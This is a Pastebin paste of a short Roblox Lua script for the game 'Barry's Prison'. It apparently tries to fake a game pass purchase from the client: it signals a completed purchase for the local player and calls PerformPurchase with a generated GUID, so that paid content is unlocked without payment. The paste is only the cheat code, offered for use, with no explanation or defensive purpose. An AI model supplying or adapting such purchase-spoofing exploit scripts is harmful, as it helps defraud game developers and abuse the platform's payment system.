GF_second

barrys prison script 2022

Nov 17th, 2022
219
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.41 KB | None | 0 0
  1. local gamePassId = 31047468
  2.  
  3. local market = game:GetService("MarketplaceService")
  4. local http = game:GetService("HttpService")
  5. local info = market:GetProductInfo(gamePassId, Enum.InfoType.GamePass)
  6. market:SignalPromptGamePassPurchaseFinished(game:GetService("Players").LocalPlayer, gamePassId, true)
  7. market:PerformPurchase(Enum.InfoType.Asset, info["ProductId"], info["PriceInRobux"], http:GenerateGUID(false))
Add Comment
Please, Sign In to add comment